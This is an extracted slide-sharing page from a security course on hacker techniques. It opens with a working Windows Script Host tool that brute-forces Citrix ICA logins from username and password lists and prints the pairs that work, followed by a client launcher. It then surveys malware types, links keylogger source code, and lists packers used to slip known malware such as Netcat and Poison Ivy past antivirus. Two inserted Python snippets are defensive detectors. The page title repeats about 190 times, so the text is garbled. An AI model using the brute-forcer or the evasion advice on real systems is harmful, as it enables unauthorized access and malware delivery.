    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
}

// Throw-away client instance: any option that is not one of ours is tried as
// an ICA client property (TCPBrowserAddress, HTTPBrowserAddress, ...) so that
// an unknown key fails here, before the attack starts.
var try_out = WScript.CreateObject('Citrix.ICAClient');

for (var i = 0; i < WScript.Arguments.length; i++) {
    var arg = WScript.Arguments(i);
    var tkn = arg.split('=');
    try {
        var name = tkn[0].replace(/^\s+|\s+$/g, '');
        var value = tkn[1].replace(/^\s+|\s+$/g, '');
        switch (name) {
            case 'timeout':
                // Milliseconds to wait between attempts.
                timeout = parseInt(value, 10);
                if (isNaN(timeout)) {
                    WScript.Echo("option 'timeout' must be an integer value");
                    WScript.Quit(1);
                }
                break;
            case 'usernames':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    usernames.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'passwords':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    passwords.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'userfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        usernames.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            case 'passfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        passwords.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            default:
                try_out.SetProp(name, value);
                parms[name] = value;
        }
    } catch (e) {
        WScript.Echo("option '" + arg + "' not recognized");
        WScript.Quit(1);
    }
}

// Bind the trailing arguments to f and return a zero-argument closure.
function frap(f) {
    var a = [];
    for (var i = 1; i < arguments.length; i++) {
        a.push(arguments[i]);
    }
    return function () {
        f.apply(f, a);
    };
}

// Every username/password combination to try.
for (var i = 0; i < usernames.length; i++) {
    for (var z = 0; z < passwords.length; z++) {
        pairs.push([usernames[i], passwords[z]]);
    }
}

// One action per pair: create an ICA client whose events are routed to global
// handlers prefixed '_ica<i>', so '_ica<i>OnLogon' fires only when the
// credentials were accepted. Each attempt queues its own disconnect.
for (var i = 0; i < pairs.length; i++) {
    actns.push(frap(function (i) {
        util['_cls' + i] = WScript.CreateObject('Citrix.ICAClient', '_ica' + i);
        util['_ica' + i + 'OnLogon'] = frap(function (i) {
            WScript.Echo(pairs[i]);   // valid credentials found
            util['_cls' + i].Disconnect();
        }, i);
        for (var z in parms) {
            util['_cls' + i].SetProp(z, parms[z]);
        }
        util['_cls' + i].SetProp('UserName', pairs[i][0]);
        util['_cls' + i].SetProp('Password', pairs[i][1]);
        util['_cls' + i].SetProp('Launch', 'TRUE');
        util['_cls' + i].Connect();
        actns.push(frap(function (i) {
            util['_cls' + i].Disconnect();
        }, i));
    }, i));
}

// Work through the queue (last in, first out), pausing 'timeout' ms between
// steps so the client has time to log on or fail.
while (1) {
    var action = actns.pop();
    if (action) {
        action();
    } else {
        WScript.Quit(0);
    }
    WScript.Sleep(timeout);
}
pdp also wrote a script to use Citrix legitimately, after a user and a password were obtained:
var client = WScript.CreateObject('Citrix.ICAClient');

if (WScript.Arguments.length == 0) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 Application=Notepad');
    WScript.Echo('');
    WScript.Echo('CITRIX Client Utility');
    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
} else {
    // Every key=value argument is set directly as an ICA client property
    // (e.g. TCPBrowserAddress, Application, UserName, Password).
    for (var i = 0; i < WScript.Arguments.length; i++) {
        var arg = WScript.Arguments(i);
        var tkn = arg.split('=');
        try {
            var name = tkn[0].replace(/^\s+|\s+$/g, '');
            var value = tkn[1].replace(/^\s+|\s+$/g, '');
            client[name] = value;
        } catch (e) {
            WScript.Echo("option '" + arg + "' not recognized");
            WScript.Quit(1);
        }
    }
}

try {
    client.Launch = "TRUE";
    client.Connect();
} catch (e) {
    WScript.Echo(e);
}
Trojans and Backdoors Effect on Business
In this section we will cover the most common malware in the world, what it does, how it works
and how it affects the world’s computer industry and the economy. The types of malware to be
covered:
• Dialers
• FraudWare
• Keyloggers
• Spyware & Browser Trojans
• Trojans
• Password Stealers
• RansomWare
• Network Share / Local Replicating Viruses
• Worms
The following is according to research by the Ponemon Institute:
We see that the annualized cost of cybercrime for the 45 companies surveyed ranged up to about
52 million dollars per company.
Here we can see that 80% of attacks result in a Trojan, backdoor, worm or virus being installed.
Auto Dialers
• Mute the modem’s speaker
• Automatically call 1-900 (premium-rate) numbers on your behalf
• You are charged between $1 and $20 or more per minute
• At the end of the month the bill usually ends with a sum greater than $5000
• Anti-viruses don’t supply a generic way to stop these; the generic defence is not to let any
software create and dial connections
FraudWare
• A fake “Anti-Spyware” or “Anti-Virus” product
• Has a GUI that looks the same as a genuine AV
• Installs some applications on your computer to scare you, for example a red desktop
background with a pirate skull and a popup saying “Virus Found, pay to purchase a license
and remove it”
• AV signatures that do know it classify it as “Not.a.virus.fraudware” and do nothing
• It may self-update to a real, unknown virus
Keylogger
• Divided into 2 types:
o User mode
▪ SetWindowsHookEx
▪ GetAsyncKeyState
▪ Code example: http://www.rootkit.com/newsread.php?newsid=346
▪ Uncaught example: keylogger running under Kaspersky 2009
o Kernel mode
▪ A driver sitting as low as the keyboard’s input path, right next to the hardware
▪ Most of them are undetectable and, once running, can shut down and delete
any anti-virus
▪ Code example:
http://www.woodmann.com/forum/attachment.php?attachmentid=1084&d=1093991813
▪ 99% uncaught
• How can we differentiate between a keylogger and a computer game?
Spyware & Browser Trojans
• Integrates itself into your browser
• Tracks browsing/buying preferences
• Steals account passwords
• Bypasses firewalls by injecting “image requests” into active, user-initiated
connections to “safe websites”
• Caught based on signatures and URL blacklists which are modified every day
Trojans
• Integrates itself into your system to stealthily run on each boot
• Opens a shell or connects back to the attacker for a live session or to retrieve
“commands”
• Some are integrated with a password stealer and a keylogger
• A famous Trojan is “SubSeven”
• Easy to write, hard to “detect” as it does the same actions legitimate software does (e.g.
Skype)
Password Stealers
• Most run once and “suicide”; others may integrate themselves into
your system to stealthily run on each boot
• Some also have an integrated keylogger
• Steal passwords saved by clients and typed into clients at runtime (e.g. dialup, email, IE,
MSN, YMSN, ICQ/AOL, Oracle, FTP passwords)
• A famous Russian password stealer: “Pinch!”
• Easy to write, almost impossible to detect as malicious (“it just reads local non-document
files and a few non-system registry entries”, “perhaps it’s a password manager?”)
RansomWare
RansomWare typically propagates like a conventional computer worm, entering a system
through, for example, a vulnerability in a network service or an e-mail attachment. It may then:
• Disable an essential system service or lock the display at system startup.
• Encrypt some of the user's personal files. Encrypting RansomWare was
originally referred to as crypto-viruses, crypto-Trojans or crypto-worms.
In both cases, the malware may extort by:
• Prompting the user to enter a code obtainable only after wiring payment to the attacker
or sending an SMS message and accruing a charge.
• Urging the user to buy a decryption or removal tool.
More sophisticated RansomWare may hybrid-encrypt the victim's plaintext with a
random symmetric key and a fixed public key. The malware author is the only party that knows
the needed private decryption key. The author who carries out this crypto-viral extortion attack
offers to recover the symmetric key for a fee.
• A famous example is “Gpcode”, which used 1024-bit RSA; Kaspersky Lab requested help
from the community to crack one variant’s key, estimating that it would take about
15 million computers running for about a year.
• How can such software be detected?! This is an everlasting logical vulnerability. It just
reads local files and deletes local files. The anti-virus model does not cover file deletion
or file reading…
Viruses and Worms Virus History
Viruses and worms are the living diseases of computers. They are the only type of software
which actually breeds itself and can even mutate completely automatically. There is no doubt
that some of the largest damages of all time to the economy were due to worm outbreaks.
Looking at the research done by the Ponemon Institute clearly proves the point.
Local Replicating Viruses
• These are the old fashioned “DOS days”, well known “viruses” which infect all the
applications in the system in order to spread and survive anti-virus removal attempts
• Since Windows 95, these viruses also replicate themselves into writable network shares,
and into restricted ones using the logged-on user’s credentials
• This virus model was almost extinct until 2004, when it was combined with spreading
through P2P file sharing: the famous “W32/Netsky.c@MM” replicated itself into the KaZaA
shared folder with attractive names such as “Microsoft WinXP Crack.exe”
• As the virus industry is now financially motivated, the latest Trojans infect non-built-in
startup applications to load on boot without changing the system configuration or files,
only the applications whose integrity is not verified.
Worms
• The term defines a virus with non-local, wide-spread propagation techniques
• Began in Windows 95 with Microsoft Office “macros” (the famous Melissa) until 2002,
when macros were disabled by default, alongside its cousin, the “mass-mailing”
worm (the famous “I Love You”), which is still at the top
• The new generation started in 2003 with “W32.Blaster”, followed by “W32.Sasser” and
many others
• These are the really money making and industry shaping viruses which conquer the
world in less than a week
• Today, since there are firewalls, these worms are spread in combination with browser
and email client infections in order to penetrate networks, and use 0-day exploits such
as the unbelievable MS08-067
Antivirus
Anti-virus is software installed on a computer endpoint or on a network content gateway (web, email…). Its purpose is to detect and remove malicious code of all kinds, from the virus and worm family up to Trojans and key-loggers.
Anti-virus products have three main operation methods:
1. Signature Based (Black-List) – inspecting any accessed content and comparing strings and code sequences from the disk and the computer’s memory against a preinstalled signature database.
2. Heuristic Based (Patterns) – inspecting the behavior of software in order to find patterns similar to those of known general/generic malicious code. The inspection usually focuses on:
a) The sequence of calls to different operating system functions
b) Creating file types with incorrect file extensions in unconventional paths
c) Application permission requests, such as accessing the memory space of other applications
d) Writing into or over a large number of closed/pre-compiled files, such as executable files
3. Sandbox – running applications “in space”, in a closed environment where it is possible to inspect everything the application is about to do, without it actually being able to harm the machine or make any changes to it.
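A minimal illustration of methods 1 and 2(b) above, added here as an example and not taken from the book: a constructed signature database is matched against file content (exact strings and a wildcard code sequence), and a magic-bytes check flags files whose real type contradicts their extension. Signature names, marker bytes and sample files are all constructed for this example.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed signature database (not a real AV feed): name -> compiled byte pattern.
# Real databases hold millions of such strings and code sequences; the matching is the same.
SIGNATURES = {
    # Exact-string signature: a fixed byte sequence that identifies one known sample.
    "Constructed.Trojan.B": re.compile(re.escape(b"\xde\xad\xbe\xefCONSTRUCTED-SIGNATURE-B")),
    # Code-sequence signature with a wildcard gap: MZ header, up to 4 arbitrary bytes,
    # then a marker. DOTALL lets '.' match newline bytes as well.
    "Constructed.Dropper.A": re.compile(rb"MZ.{0,4}BADBOT", re.DOTALL),
}

# Magic bytes -> file extensions that legitimately carry that content.
MAGIC_TO_EXTENSIONS = {
    b"MZ": {"exe", "dll", "scr", "sys", "cpl"},
    b"\x89PNG\r\n\x1a\n": {"png"},
    b"\xff\xd8\xff": {"jpg", "jpeg"},
    b"%PDF": {"pdf"},
    b"PK\x03\x04": {"zip", "docx", "xlsx", "pptx", "jar"},
}


@dataclass
class ScanResult:
    path: str
    signature_hits: List[str] = field(default_factory=list)
    heuristic_flags: List[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.signature_hits:
            return "malicious"    # black-list match: known bad
        if self.heuristic_flags:
            return "suspicious"   # pattern only: hand to the sandbox or an analyst
        return "clean"


def signature_scan(content: bytes) -> List[str]:
    """Method 1: compare the content against every preinstalled signature."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(content)]


def extension_heuristic(path: str, content: bytes) -> List[str]:
    """Method 2(b): flag content whose real type (magic bytes) does not match its extension."""
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    flags = []
    for magic, allowed in MAGIC_TO_EXTENSIONS.items():
        if content.startswith(magic) and ext not in allowed:
            flags.append(f"{magic!r} content stored with extension '.{ext or '(none)'}'")
    return flags


def scan(path: str, content: bytes) -> ScanResult:
    """Combine both methods into one verdict for a single file."""
    return ScanResult(path, signature_scan(content), extension_heuristic(path, content))


# Constructed sample files (path -> content).
SAMPLES = {
    "readme.txt": b"Nothing to see here " + b"\xde\xad\xbe\xefCONSTRUCTED-SIGNATURE-B",
    "holiday.jpg": b"MZ\x90\x00BADBOT" + b"\x00" * 32,   # executable disguised as a picture
    "report.pdf": b"PK\x03\x04" + b"\x00" * 32,           # archive disguised as a PDF
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "tool.exe": b"MZ\x90\x00" + b"\x00" * 32,             # executable with a correct extension
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        r = scan(name, data)
        print(f"{name:12} {r.verdict:10} sig={r.signature_hits} heur={r.heuristic_flags}")
```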
Packers/Crypters – Bypassing Anti-Viruses
Executable compression is any means of compressing an executable file and combining the compressed data with decompression code into a single executable. When this compressed executable is run, the decompression code recreates the original code from the compressed data before executing it. In most cases this happens transparently, so the compressed executable can be used in exactly the same way as the original.
A compressed executable can be considered a self-extracting archive, where compressed data is packaged along with the relevant decompression code in an executable file. Some compressed executables can be decompressed to reconstruct the original executable without directly executing it.
Originally, executable compression was created in order to reduce the on-disk size of executable files, especially for downloading setup installations over the internet. Later on, packing was used by software vendors in order to protect their software from reverse engineering, thereby protecting patents and trade secrets and preventing the cracking of the licensing mechanism.
Today executable compressors, aka “packers”, are used mostly by hackers and virus writers in order to bypass anti-viruses and pass known (black-listed) malware through them. Several types of packers/crypters are in common use:
1. Executable Compressor
a) UPX
2. Traditional Executable Packer
a) ASPack (Stolen API Bytes)
b) ASProtect
c) Stealth EXE Protector
3. Memory Protector (User Mode)
a) Silicon Realms Armadillo (CopyMem II, Debug Blocker, Nanomites)
b) PESpin (Debug Blocker)
4. Memory Protector (Kernel Mode)
a) Extreme Protector
b) Obsidium
5. Virtual Machine (with a virtual processor, i.e. a different CPU)
a) Themida
b) VMProtect
c) MoleBox
6. Almost infeasible to bypass
a) StarForce FrontLine ProActive
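The defender's counterpart to the packing described above, added as an example that is not the book's own material: packers leave two observable traces, well-known section names (UPX0/UPX1, .aspack, .vmp0 and the like) and very high entropy in the sections that hold the compressed code, and a minimal PE section-table parser can score both. The sample images are constructed header-only blobs (DOS stub, PE signature, COFF header, section table), not runnable executables; the section-name list and the 7.0 entropy threshold are this example's assumptions.

```python
import hashlib
import math
import struct
from typing import Dict, List, Tuple

# Section names left behind by well-known packers (UPX, ASPack, VMProtect, Themida).
# A hit is a strong hint that the file is packed; no hit is not proof that it is clean,
# since many packers rename their sections or keep the original names.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".vmp0", ".vmp1", ".themida"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes.
    Compressed or encrypted data approaches 8; plain code and text sit well below."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe_sections(image: bytes) -> List[Dict]:
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]        # NumberOfSections
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + i * 40                                            # IMAGE_SECTION_HEADER
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)  # SizeOfRawData, PointerToRawData
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def assess_packing(image: bytes, entropy_threshold: float = 7.0) -> Dict:
    """Score an image on known packer section names plus high-entropy sections of real size."""
    sections = parse_pe_sections(image)
    packer_names = [s["name"] for s in sections if s["name"] in KNOWN_PACKER_SECTIONS]
    high_entropy = [s["name"] for s in sections
                    if s["raw_size"] >= 256 and s["entropy"] >= entropy_threshold]
    return {"sections": sections, "packer_sections": packer_names,
            "high_entropy": high_entropy, "likely_packed": bool(packer_names or high_entropy)}


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for compressed data."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Constructed test image: DOS stub, PE signature, COFF header with no optional header,
    a section table and the raw section data. Enough for the parser, not a runnable program."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    table, blobs = b"", b""
    for name, data in sections:
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIIIIIHHI", len(data), 0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + table + blobs


# Constructed samples: one that looks UPX-packed, one that looks like an ordinary build.
PACKED_SAMPLE = build_sample_pe([(".text", b"plain text " * 100), ("UPX1", pseudo_random(4096))])
CLEAN_SAMPLE = build_sample_pe([(".text", b"plain text " * 100), (".data", b"\0" * 512)])

if __name__ == "__main__":
    for label, image in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        result = assess_packing(image)
        print(label, "likely_packed =", result["likely_packed"])
        for s in result["sections"]:
            print(f"  {s['name']:8} size={s['raw_size']:5} entropy={s['entropy']:.2f}")
```

Entropy alone also catches packers that copy ordinary section names, which is why the score does not rely on the name list by itself.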
[Screenshots (images not included in the text extraction): Netcat – Original – Less Than Packed; Bypassing Antivirus – Netcat * MEW; Netcat * RDG PolyPack v1.1; Poison Ivy; SCPack 1.1; Alternate EXE Packer; Poison Ivy * MEW]
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling
Hacker techniques, exploit and incident handling

More Related Content

What's hot

Mvc music store tutorial - v3.0
Mvc music store   tutorial - v3.0Mvc music store   tutorial - v3.0
Mvc music store tutorial - v3.0jackmilesdvo
 
Soa In The Real World
Soa In The Real WorldSoa In The Real World
Soa In The Real Worldssiliveri
 
Quick testprofessional book_preview
Quick testprofessional book_previewQuick testprofessional book_preview
Quick testprofessional book_previewSaurabh Singh
 
Mysql tutorial-excerpt-5.1-en
Mysql tutorial-excerpt-5.1-enMysql tutorial-excerpt-5.1-en
Mysql tutorial-excerpt-5.1-enRifky Rachman
 
Documentation de Doctrine ORM
Documentation de Doctrine ORMDocumentation de Doctrine ORM
Documentation de Doctrine ORMgueste89c23
 
The Defender's Dilemma
The Defender's DilemmaThe Defender's Dilemma
The Defender's DilemmaSymantec
 
It Sector Risk Assessment Report Final
It Sector Risk Assessment Report FinalIt Sector Risk Assessment Report Final
It Sector Risk Assessment Report FinalHongyang Wang
 
Comparing Game Development on the Android and Windows Phone 7 Platforms.
Comparing Game Development on the Android and Windows Phone 7 Platforms.Comparing Game Development on the Android and Windows Phone 7 Platforms.
Comparing Game Development on the Android and Windows Phone 7 Platforms.Ruairí O'Brien
 
A Real Time Application Integration Solution
A Real Time Application Integration SolutionA Real Time Application Integration Solution
A Real Time Application Integration SolutionMatthew Pulis
 
iOS App Reverse Engineering
iOS App Reverse EngineeringiOS App Reverse Engineering
iOS App Reverse EngineeringZishe Sha
 
Sybase Adaptive Server Anywhere for Linux
Sybase Adaptive Server Anywhere for LinuxSybase Adaptive Server Anywhere for Linux
Sybase Adaptive Server Anywhere for Linuxmarcorinco
 

What's hot (18)

Mvc music store tutorial - v3.0
Mvc music store   tutorial - v3.0Mvc music store   tutorial - v3.0
Mvc music store tutorial - v3.0
 
Soa In The Real World
Soa In The Real WorldSoa In The Real World
Soa In The Real World
 
Quick testprofessional book_preview
Quick testprofessional book_previewQuick testprofessional book_preview
Quick testprofessional book_preview
 
Mysql tutorial-excerpt-5.1-en
Mysql tutorial-excerpt-5.1-enMysql tutorial-excerpt-5.1-en
Mysql tutorial-excerpt-5.1-en
 
Hacking.pdf
Hacking.pdfHacking.pdf
Hacking.pdf
 
Documentation de Doctrine ORM
Documentation de Doctrine ORMDocumentation de Doctrine ORM
Documentation de Doctrine ORM
 
The Defender's Dilemma
The Defender's DilemmaThe Defender's Dilemma
The Defender's Dilemma
 
Reseller's Guide
Reseller's GuideReseller's Guide
Reseller's Guide
 
Wisr2011 en
Wisr2011 enWisr2011 en
Wisr2011 en
 
It Sector Risk Assessment Report Final
It Sector Risk Assessment Report FinalIt Sector Risk Assessment Report Final
It Sector Risk Assessment Report Final
 
Comparing Game Development on the Android and Windows Phone 7 Platforms.
Comparing Game Development on the Android and Windows Phone 7 Platforms.Comparing Game Development on the Android and Windows Phone 7 Platforms.
Comparing Game Development on the Android and Windows Phone 7 Platforms.
 
A Real Time Application Integration Solution
A Real Time Application Integration SolutionA Real Time Application Integration Solution
A Real Time Application Integration Solution
 
iOS App Reverse Engineering
iOS App Reverse EngineeringiOS App Reverse Engineering
iOS App Reverse Engineering
 
Drools expert-docs
Drools expert-docsDrools expert-docs
Drools expert-docs
 
Sample training manual
Sample training manualSample training manual
Sample training manual
 
Sybase Adaptive Server Anywhere for Linux
Sybase Adaptive Server Anywhere for LinuxSybase Adaptive Server Anywhere for Linux
Sybase Adaptive Server Anywhere for Linux
 
Derivatives
DerivativesDerivatives
Derivatives
 
Fr a200
Fr a200Fr a200
Fr a200
 

Viewers also liked

Top 10 mistakes running a windows network
Top 10 mistakes   running a windows networkTop 10 mistakes   running a windows network
Top 10 mistakes running a windows networkRafel Ivgi
 
Ciso back to the future - network vulnerabilities
Ciso   back to the future - network vulnerabilitiesCiso   back to the future - network vulnerabilities
Ciso back to the future - network vulnerabilitiesRafel Ivgi
 
Issa security in a virtual world
Issa   security in a virtual worldIssa   security in a virtual world
Issa security in a virtual worldRafel Ivgi
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 

Viewers also liked (6)

Top 10 mistakes running a windows network
Top 10 mistakes   running a windows networkTop 10 mistakes   running a windows network
Top 10 mistakes running a windows network
 
Ciso back to the future - network vulnerabilities
Ciso   back to the future - network vulnerabilitiesCiso   back to the future - network vulnerabilities
Ciso back to the future - network vulnerabilities
 
Issa security in a virtual world
Issa   security in a virtual worldIssa   security in a virtual world
Issa security in a virtual world
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
Darknet
DarknetDarknet
Darknet
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 

Similar to Hacker techniques, exploit and incident handling

Guia definitiva de shodan
Guia definitiva de shodanGuia definitiva de shodan
Guia definitiva de shodannoc_313
 
Linux for professional
Linux for professionalLinux for professional
Linux for professionalBennethObilor
 
Easttom C. Computer Security Fundamentals 3ed 2016.pdf
Easttom C. Computer Security Fundamentals 3ed 2016.pdfEasttom C. Computer Security Fundamentals 3ed 2016.pdf
Easttom C. Computer Security Fundamentals 3ed 2016.pdfJarellScott
